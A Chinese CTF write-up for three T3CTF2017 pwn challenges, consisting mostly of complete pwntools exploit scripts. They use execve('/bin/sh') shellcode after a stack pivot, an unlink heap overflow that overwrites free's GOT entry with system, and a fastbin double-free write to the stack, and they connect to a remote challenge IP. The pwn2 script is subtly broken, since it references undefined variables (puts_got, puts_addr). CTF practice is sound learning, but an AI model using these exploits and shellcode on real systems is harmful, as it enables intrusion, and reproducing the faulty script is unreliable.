【pwn】T3CTF2017 堆溢出以及return to dl slove

pwn1,没什么好说的,看了下checksec,NX没开,栈迁移以后直接执行bss上的shellcode就可以了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from roputils import *
import pwn
p = pwn.remote("127.0.0.1",12346)
addr_bss = 0x0804A080
buf = p32(0x0804A080+4)+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
buf += (0x1f4-len(buf))*'a'
p.send(buf)
buf = 'a'*504
buf += p32(0x0804A080+4)
p.sendline(buf)
data = p.recvuntil("\n")
p.sendline("cat /lib/x86_64-linux-gnu/libc.so.6")
p.interactive()

pwn2的libc可以从pwn1中获取。非常经典的double free教学题。可以参考 http://www.tuicool.com/articles/yquU732 (double free浅析,乌云的文章)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2017-04-07 19:09:17
# @Author : WinterSun (511683586@qq.com)
# @Link : https://Winter3un.github.io/
from pwn import *
context(log_level="debug")
DEBUG = 0
if DEBUG:
p = process('./pwn2')
# gdb.attach(p,"b*0x0400A6D\nc")
else:
p = remote("120.27.248.138",12345)
def sd(data):
p.sendline(data)
def ru(data):
return p.recvuntil(data)
def add(index,length,data):
ru("the action:")
sd("1")
ru("note index:\n")
sd(str(index))
ru(" of the new note:\n")
sd(str(length))
ru("ts of note:")
sd(data)
def dele(index):
ru("the action:")
sd("2")
ru("ter the note index:")
sd(str(index))
def edit(index,length,data):
ru("the action:")
sd("3")
ru(" note index:")
sd(str(index))
ru(" new note:")
sd(str(length))
ru("of note:\n")
sd(data)
def show(index):
ru("the action:")
sd("4")
ru(" note index:")
sd(str(index))
def edit_anyaddr(addr,data):
payload = '\x00'*0x18+p64(0x6020a8)+p64(0)+p64(addr)
edit(0,len(payload),payload)
edit(2,len(data),data)
add(0,512,"aaa")
add(1,512,"aaa")
add(2,512,"aaa")
add(3,512,"/bin/sh\x00")
head = p64(0)+p64(1+512)
fd = p64(0x6020C0 - 0x18)
bk = p64(0x6020C0 - 0x10)
payload = head+fd+bk
payload += "a"*(512-len(payload))
payload += p64(512)+p64(512+0x10)
payload += "a"*(600-len(payload))
edit(0,600,payload)
dele(1)
free_got = 0x602018
edit_anyaddr(0x6020C0+0x20,p64(puts_got))
show(4)
free_addr = u64(ru("\n")[:-1].ljust(8,"\x00"))
print "free_addr="+hex(free_addr)
offset = 0x83940-0x45390
system_addr = puts_addr - offset
edit_anyaddr(0x602018,p64(system_addr))
dele(3)
p.interactive()
#flag{038a6d27a716d1e1472b1eded07c385d}

pwn3是fastbin double free attack的考察点,要利用这个攻击我们需要伪造出一个fake fastbin出来,所幸题目给予了所有的攻击条件。

可参考 https://github.com/shellphish/how2heap/blob/master/fastbin_dup_into_stack.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2017-04-07 19:09:17
# @Author : WinterSun (511683586@qq.com)
# @Link : https://Winter3un.github.io/
import roputils
from pwn import *
context(log_level="debug")
DEBUG = 1
if DEBUG:
p = process('./pwn3')
# gdb.attach(p,"b*0x4009da\nc")
# else:
# p = remote()
def sd(data):
p.sendline(data)
def ru(data):
return p.recvuntil(data)
def welcome(data):
ru("name\n")
sd(data)
def add(index,length,data):
ru("delete paper\n")
sd("1")
ru("o store(0-9):")
sd(str(index))
ru("ill enter:")
sd(str(length))
ru("our content:")
sd(data)
def add2(index,length,data):
sd("1")
ru("o store(0-9):")
sd(str(index))
ru("ill enter:")
sd(str(length))
ru("our content:")
sd(data)
def dele(index):
ru("delete paper\n")
sd("2")
ru("index(0-9):")
sd(str(index))
def setsize(size):
ru("delete paper\n")
sd("3")
ru("number:")
sd(str(size))
def leak_stack():
ru("delete paper\n")
sd("a"*(0x30))
ru("\n")
sd("a"*(0x30))
return u64(ru("\n")[0x30:0x30+6].ljust(8,"\x00"))
buf = ""
buf += "\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68"
buf += "\x00\x53\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6"
buf += "\x52\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68"
buf += "\x00\x56\x57\x48\x89\xe6\x0f\x05"
shellcode = buf
shellcode_addr = 0x6020c0
welcome(shellcode)
setsize(0x30)
stack_addr = leak_stack()
print "stack_addr="+hex(stack_addr)
offset = 0x7ffcfca53d30 - 0x00007ffcfca53c20
target_addr = stack_addr-offset-0x8
print "offset = "+hex(offset)
print "target_addr = "+hex(target_addr)
add2(0,0x20,"aaa")
add(1,0x20,"aaa")
dele(0)
dele(1)
dele(0)#a-b-a
add(0,0x20,p64(target_addr))
add(1,0x20,"aaa")
add(2,0x20,p64(target_addr))
payload = "a"*0x10+p64(shellcode_addr)
add(3,0x20,payload)
sd("4")
p.interactive()

×

你要赏我吃糖果吗?

扫码支持
扫码打赏,你说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

文章目录
,
隐藏